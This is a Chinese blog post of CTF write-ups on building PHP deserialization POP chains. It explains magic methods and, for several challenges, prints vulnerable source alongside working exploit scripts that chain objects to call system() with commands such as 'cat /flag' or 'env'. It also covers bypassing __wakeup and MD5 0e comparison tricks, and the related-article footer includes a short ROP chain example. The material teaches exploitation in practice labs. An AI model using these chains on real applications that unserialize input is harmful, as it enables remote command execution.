POP链构造

已于 2024-02-23 13:34:48 修改
阅读量1.6k 收藏 46
点赞数 52
分类专栏: WEB安全 文章标签: 安全 php 网络安全 http https web安全
于 2024-02-23 13:28:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/VZS_0/article/details/136253376
版权

目录

魔术方法:

BeginCTF_POPgadget

NSSCTF_POP

popchain POC

[SWPUCTF 2022 新生赛]ez_1zpop 

[HZNUCTF 2023 preliminary]ppppop

魔术方法:

__call 触发条件:当前对象调用一个不存在的方法时,就会被触发。

__get触发条件:当前对象试图引用一个难以达到的成员属性的时候自动触发 。

call_user_func : 把第一个参数作为回调函数调用。

__tostring:

//对象转字符串方法
        //要求只能返回字符串类型的数据
        public function __toString(){
            //将需要输出的对象的属性返回即可
            //组织语言进行输出(控制属性的输出)
 
 
 
 $person = new Person('周芷若',15);
    //var_dump($person);
​
    //echo $person;        //对象不能被当做字符串输出
    
    //需求:echo 对象,输出对象里面的所有属性(所有的属性连接成一个字符串)
    echo $person;

call_user_func和call_user_func_array的区别PHP函数call_user_func和call_user_func_array详解 - 简书

__construct 当一个对象创建时被调用,

__destruct 当一个对象销毁时被调用,

__toString 当一个对象被当作一个字符串被调用。

__wakeup() 使用unserialize时触发

__sleep() 使用serialize时触发

__destruct() 对象被销毁时触发

__call() 对不存在的方法或者不可访问的方法进行调用就自动调用

__callStatic() 在静态上下文中调用不可访问的方法时触发

__get() 用于从不可访问的属性读取数据

__set() 在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用

__isset() 在不可访问的属性上调用isset()或empty()触发

__unset() 在不可访问的属性上使用unset()时触发

__toString() 把类当作字符串使用时触发,返回值需要为字符串

__invoke() 当脚本尝试将对象调用为函数时触发

魔术方法的触发只能在当前函数!!

BeginCTF_POPgadget

原码:

<?php
​
highlight_file(__FILE__);
class Fun{
    private $func = 'call_user_func_array';
    public function __call($f,$p){
        call_user_func($this->func,$f,$p);
    }
}
​
class Test{
    public function __call($f,$p){
        echo getenv("FLAG");
    }
    public function __wakeup(){
        echo "serialize me?";
    }
}
​
class A {
    public $a;
    public function __get($p){
        if(preg_match("/Test/",get_class($this->a))){
            return "No test in Prod\n";
        }
        return $this->a->$p();
    }
}
​
class B {
    public $p;
    public function __destruct(){
        $p = $this->p;
        echo $this->a->$p;
    }
}
​
if(isset($_REQUEST['begin'])){
    unserialize($_REQUEST['begin']);
}
?>

WP:

<?php
class Fun{
​
  private $func = 'system';
​
  public function ___call($f,$p){
​
    call_user_func($this->func,$f,$p);
​
  }
​
}
class A {
​
  public $a;
​
  public function __get($p){
​
    if(preg_match("/Test/",get_class($this->a))){
​
     return "No test in Prod\n";
​    }
​
   return $this->a->$p();
​
  }
​
}
class B {
​
  public $p;
​
    public $a;
     public function __destruct(){
​
    $p = $this->p;
​
    echo $this->a->$p;
​
  }
​
}
​
​
​$bb = new B();
​
$aa = new A();
​
$F = new Fun();//实例化
​
//链子
​
$bb->a = $aa;//可以访问a,但是需要自定义一个public $a; 访问不存在的属性触发__get()
​
$aa->a = $F;//访问FUN类里不存在的方法,触发__call()
​
$bb->p = 'printenv';//或者env (linux下的命令),向call_user_func(fun类)的$p传递system命令参数
​
echo urlencode(serialize($bb));
​
?>

官方WP:

<?php
class Fun{
    private $func;

    public function __construct(){
        $this->func = array(new Test,"__call");
    }
}

class Test{
}

class A {
    public $a;

    public function __construct($a){
        $this->a = $a;
    }
}

class B {
    public $p = "aaa";
}

$a = new B();
$b = new A(new Fun());
$a->a = $b;
echo urlencode(serialize($a));
?>

NSSCTF_POP
<?php
​
error_reporting(0);
show_source("index.php");
​
class w44m{
​
    private $admin = 'aaa';
    protected $passwd = '123456';
​
    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}
​
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}
​
class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}
​
$w00m = $_GET['w00m'];
unserialize($w00m);
​
?>

错误poc:

<?php
class w44m{
​
    private $admin = 'w44m';
    protected $passwd = '08067';
​
​
    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}
​
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}
​
class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}
//实例化
$w2=new w22m();
$w3=new w33m();
$w4=new w44m();
​
$w2->w00m=$w3;
$w3->w00m=$w3;
$w3->w22m='w33m';
​
echo urlencode(serialize($w2));
​
​
​
?>

正确的POC

<?php
class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';
}
​
class w22m{
    public $w00m;
​
}
​
class w33m{
    public $w00m;
    public $w22m;
​
}
//实例化
$w2=new w22m();
$w3=new w33m();
$w4=new w44m();
​
$w2->w00m=$w3;//从destruct开始顺理成章来到w33m里
$w3->w00m=$w4;//来到w44m类里面,方便下一步访问。但是我需要触发tostring,利用下一步方法
$w3->w22m='Getflag';//访问w44m里的方法Getflag字符串 触发to_string
echo urlencode(serialize($w2));
?>

[NISACTF 2022]_[nisactf 2022]bqt-CSDN博客

popchain POC
<?php
class Road_is_Long{
    public $page;
    public $string;
}
class Try_Work_Hard{
    protected  $var='/flag';
}
class Make_a_Change{
    public $effort;
​
}
$r=new Road_is_Long;
$t=new Try_Work_Hard;
$m=new Make_a_Change;
$r->page=$r;//触发正则进行匹配,page类对象会被解析成字符串去匹配正则,触发tostring
$r->string=$m;//m类里面没有page这个属性,此时的page会被自动认为是属性/方法,而不是类,触发get
$m->effort=$t;//将对象当成函数,此时触发当前对象下的invoke,最后include('/flag');
echo urlencode(serialize($r));
?>
[SWPUCTF 2022 新生赛]ez_1zpop 

知识点提前介绍: 

0e绕过

md5相等及碰撞绕过_md5强等于绕过-CSDN博客^v99^pc_search_result_base2&utm_term=md5%E7%9B%B8%E7%AD%89%E7%9A%84%E4%B8%8D%E5%90%8C%E5%AD%97%E7%AC%A6%E4%B8%B2&spm=1018.2226.3001.4187

第一步:把没必要的代码删除

小经验:__construct函数在反序列化题直接删掉,它只在初始化时生效

dxg对象是没有价值信息,删掉

 源码:

<?php
error_reporting(0);
class dxg
{
   function fmm()
   {
      return "nonono";
   }
}

class lt
{
   public $impo='hi';
   public $md51='weclome';
   public $md52='to NSS';
   function __construct()
   {
      $this->impo = new dxg;
   }
   function __wakeup()
   {
      $this->impo = new dxg;
      return $this->impo->fmm();
   }

   function __toString()
   {
      if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
         return $this->impo->fmm();
   }
   function __destruct()
   {
      echo $this;
   }
}

class fin
{
   public $a;
   public $url = 'https://www.ctfer.vip';
   public $title;
   function fmm()
   {
      $b = $this->a;
      $b($this->title);
   }
}

if (isset($_GET['NSS'])) {
   $Data = unserialize($_GET['NSS']);
} else {
   highlight_file(__file__);
}

处理后: 

class lt{
    public $impo = 'hi';
    public $md51 = 'weclome';
    public $md52 = 'to NSS';
    function __wakeup(){
        $this->impo = new dxg;
        return $this->impo->fmm();
    }
    function __toString(){
        if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
            return $this->impo->fmm();
    }
    function __destruct(){
        echo $this;
    }
}
class fin{
   public $a;
   public $url = 'https://www.ctfer.vip';
   public $title;
   function fmm(){
      $b = $this->a;
      $b($this->title);
   }
}

分析:

fin对象

fmm方法通过给b赋值后,当函数调用,如果给b赋值后,当函数调用,如果给b=‘system’

title再传入我们想要的命令

最后就可得到例,system(‘ls’) => a='system';a=′syste**m′;title=‘目标命令’

lt对象

反序列化触发wakeup,destruct,wakeup方法中,给impo实例一个dxg对象,并直接return,无法获取有效信息,绕过wakeup的方法很简单,只需要将反序列化后的字符串,将对象属性数量改大,如,O:3:“fin”:3:{s:1:“a”;N;s:3:“url”;N;s:5:“title”;N;} => O:3:“fin”:4:{s:1:“a”;N;s:3:“url”;N;s:5:“title”;N;}

destruct方法触发就很简单了,将自己当字符串输出,直接触发toString方法,返回fmm方法

(isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
// isset() 判断是否配置impo
// md5($this->md51) == md5($this->md52)  弱等于
// s155964671a  =md5=> 0e342768416822451524974117254469
// s214587387a  =md5=> 0e848240448830537924465865611904

构造: 

<?php
class lt
{
   public $impo='';
   public $md51='s1885207154a';
   public $md52='s1836677006a';//0e绕过

}

class fin
{
   public $a='system';
   public $title='cat /flag';

}
//实例化
$lt=new lt();
$fin=new fin();
//链子:
$lt->impo=$fin;
echo urlencode(serialize($lt));
?>记得绕过wakeup

MD5值 md5("s1885207154a") => 0e509367213418206700842008763514 md5("s1836677006a") => 0e481036490867661113260034900752

[HZNUCTF 2023 preliminary]ppppop

有关setcookies:https://www.cnblogs.com/xingmeng/p/3376027.html

bp抓包修改set-cookie

pop链错误构造

strrev()函数:返回一个新的字符串,其中的原始字符串被反转了。

解密后反转,所以要反转后加密获取post值(剥洋葱)

<?php
class A {
    public $className;
    public $funcName;
    public $args;

}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}
$aa=new A;
//实例化
$aa->className='B';
$aa->funcName='system';
$aa->args='env';
echo urlencode(base64_encode(strrev(serialize($aa))));

?>

 修改set-cookie 0变1得到源代码;

参考:

https://www.cnblogs.com/Article-kelp/p/14726217.html

burpsuite抓包GET传参转为POST传参_burpsuite把get改为post-CSDN博客

VZS_0
关注
  • 52
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
C++栈(stack)的模板类实现代码
01-21
本文实例为大家分享了C++栈(stack)的模板类实现代码,供大家参考,具体内容如下 1.基本概念   栈中的元素遵守“先进后出”的原则(LIFO,Last In First Out)   只能在栈顶进行插入和删除操作   压栈(或推入、进栈)即push,将数据放入栈顶并将栈顶指针加一   出栈(或弹出)即pop,将数据从栈顶删除并将栈顶指针减一   栈的基本操作有:pop,push,判断空,获取栈顶元素,求栈大小 2.构造栈   可以使用数组构造栈,也可以使用单向链表构造,我觉得使用单向链表更加灵活方便,下面的例子我使用单向链表来构造栈。   单向链表的头插法比较适合,链表头作为栈顶:
BeginCTF2024 wp web&&misc
永不落的梦想
02-06 1123
php反序列化,源码如下;B::__destruct()作为开头,调用A不存在的变量,触发A::__get(),调用Fun不存在的方法,触发__call的回调函数执行phpinfo,flag在phpinfo中;
moon:用于在C ++和Lua脚本语言之间映射数据,函数和类的库
03-07
月亮 在制品 用于在C ++和Lua脚本语言之间映射数据,函数和类的库。 使用简单的静态方法可以避免构造对象的需要。 仍在发展中。 性能仍然需要测量和改进。 入门 要开始使用Moon,只需下载并将其包含在您的项目中即可。 Moon需要使用C ++ 17编译器和Lua。 如果您不想自己处理加入Lua的麻烦,Moon会通过CMake为您解决。 将其作为子目录添加到项目中,并将其与二进制文件链接。 如果Moon在您的系统中找不到Lua,它将下载并编译它。 例子 # include < moon> int main () { Moon::Init (); Moon::Push ( true ); auto b = Moon::Get< bool>(- 1 ); Moon::Pop (); Moon::Regist
数据结构实验.rar
06-29
实验一: 1、(必做题)采用函数统计学生成绩:输入学生的成绩,计算并输出这些学生的最低分、最高分、平均分。 2、(必做题)采用递归和非递归方法计算k阶裴波那契序列的第n项的值,序列定义如下: f0=0, f1=0, …, fk-2=0, fk-1=1, fn= fn-1+fn-2+…+fn-k (n>=k) 要求:输入k(1<=k<=5)和n(0<=n<=30),输出fn。 3、(选做题)采用递归和非递归方法求解汉诺塔问题,问题描述如下: 有三根柱子A、B、C,在柱子A上从下向上有n个从大到小的圆盘,在柱子B和C上没有圆盘,现需将柱子A上的所有圆盘移到柱子C上,可以借助柱子B,要求每次移动一个圆盘,每根柱子上的圆盘只能大的在下,小的在上。 要求:输入n,输出移动步骤。 实验二: 1、(必做题)每个学生的成绩信息包括:学号、语文、数学、英语、总分、加权平均分;采用动态方法创建数组用于存储若干学生的成绩信息;输入学生的学号、语文、数学、英语成绩;计算学生的总分和加权平均分(语文占30%,数学占50%,英语占20%);输出学生的成绩信息。 2、(必做题)可以在数组末尾追加新学生的成绩信息;可以根据学号,删除该学生的成绩信息。 3、(选做题)可以根据学号或总分,升序排序学生的成绩信息。 实验三: 1、(必做题)每个学生的成绩信息包括:学号、语文、数学、英语、总分、加权平均分;采用链表存储若干学生的成绩信息;输入学生的学号、语文、数学、英语成绩;计算学生的总分和加权平均分(语文占30%,数学占50%,英语占20%);输出学生的成绩信息。 2、(必做题)可以在链表末尾追加新学生的成绩信息;可以根据学号,删除该学生的成绩信息。 3、(选做题)可以根据学号或总分,升序排序学生的成绩信息。 实验四: 1、(必做题)假设有序表中数据元素类型是整型,请采用顺序表或(带头结点)单链表实现: (1)OrderInsert(&L, e, int (*compare)(a, b)) //根据有序判定函数compare,在有序表L的适当位置插入元素e; (2)OrderInput(&L, int (*compare)(a, b)) //根据有序判定函数compare,并利用有序插入函数OrderInsert,构造有序表L; (3) OrderMerge(&La, &Lb, &Lc, int (*compare)()) //根据有序判定函数compare,将两个有序表La和Lb归并为一个有序表Lc。 2、(选做题)请实现: (1)升幂多项式的构造,升幂多项式是指多项式的各项按指数升序有序,约定系数不能等于0,指数不能小于0; (2)两个升幂多项式的相加。 实验五: 1、(必做题)假设栈中数据元素类型是字符型,请采用顺序栈实现栈的以下基本操作: (1)Status InitStack (&S) //构造空栈S; (2)Status Push(&S, e) //元素e入栈S; (3)Status Pop(&S, &e) //栈S出栈,元素为e。 2、(必做题)假设队列中数据元素类型是字符型,请采用链队列实现队列的以下基本操作: (1)Status InitQueue(&Q) //构造空队列Q; (2)Status EnQueue(&Q, e) //元素e入队列Q; (3)Status DeQueue (&Q, &e) //队列Q出队列,元素为e。 3、(必做题)请实现:对于一个可能包括括号{}、[]、()的表达式,判定其中括号是否匹配。 实验六: 1、(必做题)假设二叉树中数据元素类型是字符型,请采用二叉链表实现二叉树的以下基本操作: (1)根据二叉树的先序序列和中序序列构造二叉树; (2)根据先序遍历二叉树; (3)根据中序遍历二叉树; (4)根据后序遍历二叉树。 测试数据包括如下错误数据: 先序:1234;中序:12345 先序:1234;中序:1245 先序:1234;中序:4231 2、(必做题)对于一棵二叉树,请实现: (1)计算二叉树的叶子数目; (2)计算二叉树的深度。 3、(选做题)给定n个权值,请构造它们的最优二叉树(赫夫曼树)。 期末大实验: 一、任意长十进制整数加法 二、车厢调度 三、赫夫曼编/译码 四、无线广播部署
ios-使用转场动画构造侧滑.zip
07-11
原理:转场动画push pop 菜单控制器做成左边不透明一部分右边透明,代码里复制了之前控制器的视图会在这里显示 菜单和菜单详情是用的两个不同的转场动画实现的 博客园链接:http://www.cnblogs.com/hxwj/p/5169539.html
php反序列化—POP 链的构造利用
cosmoslin的博客
09-14 1990
POP 链的构造利用 一、POP链简介 1、POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadg
php反序列化之pop构造
m0_62422842的博客
04-06 7393
前言 随着对反序列化学习的不断深入,我们来学习一下pop链的构造。这个pop链对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop链的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop链,从而达到
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 1892
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop链则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
ctf-pop
qq_32445755的博客
05-15 1850
POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2139
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
C#基础类库
07-11
构造函数2.私有字段3.设置字体4.设置页面大小 5.实例化文档6.打开文档对象7.关闭打开的文档8.添加段落9.添加图片10.添加链接、点 等功能 10.ResourceManager 操作类 AppMessage app消息格式化类,返加字符串帮助类...
【Web】小白也能看懂的BeginCTF个人wp(全)
uuzeray的博客
02-06 2486
纯萌新,贴出自己的wp,一起交流学习QWQ。
beginCTF 2024 Web方向题解WP 全
Jay17的博客
02-06 1647
beginCTF 2024 Web方向题解WP 全
CTF笔记 [SWPUCTF 2021 新生赛]pop
qq_51248658的博客
10-28 2361
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
BeginCTF2024——个人WP(部分)
最新发布
ASD830的博客
02-07 1883
union联合查询注入,空格绕过:/**/,双写绕过,like过滤等号”=”绕过,文件读取函数:load_file('/path')
PHP反序列化pop链的构造
Elite的博客
03-28 799
简单易懂的反序列化pop构造
php中的pop构造
blackguest07的博客
03-02 1239
php中反序列化漏洞的原理,pop链的构造
POP链[MRCTF2020]Ezpop
cxiaodi的博客
06-11 84
pop
帮我写一个pop构造
05-05
首先,让我们回顾一下pop链的概念:pop链是一种利用栈溢出漏洞来实现任意代码执行的攻击手段。它的基本思路是:通过构造一条ROP链,将栈中的返回地址覆盖成pop指令的地址,从而将攻击者控制的地址弹出栈顶,进而实现任意代码执行。 下面是一个简单的pop构造示例,假设目标程序存在一个栈溢出漏洞,攻击者想要利用该漏洞实现任意代码执行: ```python # pop构造示例 # pop rdi; ret指令的地址,用于将下一个参数送入rdi寄存器 pop_rdi_ret = 0x4006b3 # system函数的地址,用于调用system函数执行shell命令 system_addr = 0x7ffff7a52390 # /bin/sh字符串的地址,用于作为system函数的参数 bin_sh_addr = 0x7ffff7b97018 # 构造poppop_chain = p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr) # 将pop_chain写入溢出的缓冲区,覆盖返回地址 payload = b'A' * 32 + pop_chain # 触发栈溢出漏洞,执行pop链 ``` 在这个示例中,我们构造了一条包含三个指令的pop链,分别是pop rdi; ret、system和/bin/sh字符串的地址。通过将pop_chain写入溢出的缓冲区,我们可以覆盖返回地址,从而让程序跳转到pop rdi; ret指令的地址,执行pop rdi指令将/bin/sh字符串的地址送入rdi寄存器,再执行ret指令弹出栈顶,跳转到system函数的地址,最终调用system函数执行shell命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值